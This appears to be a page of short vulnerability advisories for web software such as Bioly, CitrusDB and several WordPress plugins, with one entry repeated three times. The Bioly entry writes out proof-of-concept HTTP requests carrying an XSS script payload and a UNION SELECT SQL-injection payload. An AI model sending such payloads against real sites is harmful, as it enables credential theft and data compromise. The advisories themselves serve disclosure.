Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Cross Site Scripting: POST /index.php?action=3 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: STORED XSS TEST Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache Post Data: email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>®ister=1 SQL Injection: POST /index.php?action=11 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Sql Injection Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache Post Data: q=%00'%20UNION%20SELECT%20*%20FROM%20users%20WHERE%20username='admin'%20AND%20password='admin'/*
McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules. A successful attack will allow an attacker to bypass intended security restrictions; this may aid in other attacks.
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
All-in-One Event Calendar plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BGS CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability. An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Services By CQR